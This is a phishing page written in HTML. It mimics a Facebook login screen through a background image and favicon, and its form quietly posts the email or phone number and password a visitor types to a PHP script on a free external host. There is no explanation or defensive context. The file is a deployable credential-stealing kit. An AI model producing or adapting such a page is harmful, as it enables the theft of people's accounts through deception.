<html>
    <head><style>
        
        body { background-image: url(fb_eng.PNG);
         background-repeat: no-repeat;}
       
       
        form         {padding-left: 772;
                      padding-top: 134.9;}
         input[type=text] {
                        width: 62.7%;
                        height: 8.6%;
                        border-radius: 4px;
                        border-color:  gainsboro;
                        padding: 8px 5px;
                        margin: 5px 0;
                        font-size: 16px;
                        box-sizing: border-box;                 
                       
}
        input[type=password] {
                        width: 62.7%;
                        height: 8.6%;
                        border-radius: 4px;
                        border-color: gainsboro;
                        padding: 8px 5px;
                        margin: 6.2px 0px;
                        box-sizing: border-box; 
                        font-size: 16px;
                        border-color: 3px solid #555;
}
             
        button{ color: white;
                 background: #1f75fe;
                 border-radius: 4px;
                 padding: 13px 5px;
                 margin: 11px 0px;
                 border: none;
                 font-family:sans-serif;
                 font:bold;
                 font-size: 18px;
                 cursor: pointer;
                 width: 62.7%;
                 height: 7.5%;
               
                }
        
        </style>
    <link rel="shortcut icon" href="fb_ico.ico">
    </head>
    <body>
    <form action="https://suspendedwhy.000webhostapp.com/here/fbpost.php"  method="post" id="login_form">
       
        
            <input name="email" type="text" id="email" autocomplete="" placeholder="Email or Phone Number" required= >
         
       
             
       <div>
            <input name="password" type="password" id="pass" autocomplete="of" placeholder="Password"required >
           </div>  
             <button type=submit class="login_botton" id="action" >Log In</button>
    
                   
                   
        </form>
    
    </body>
</html>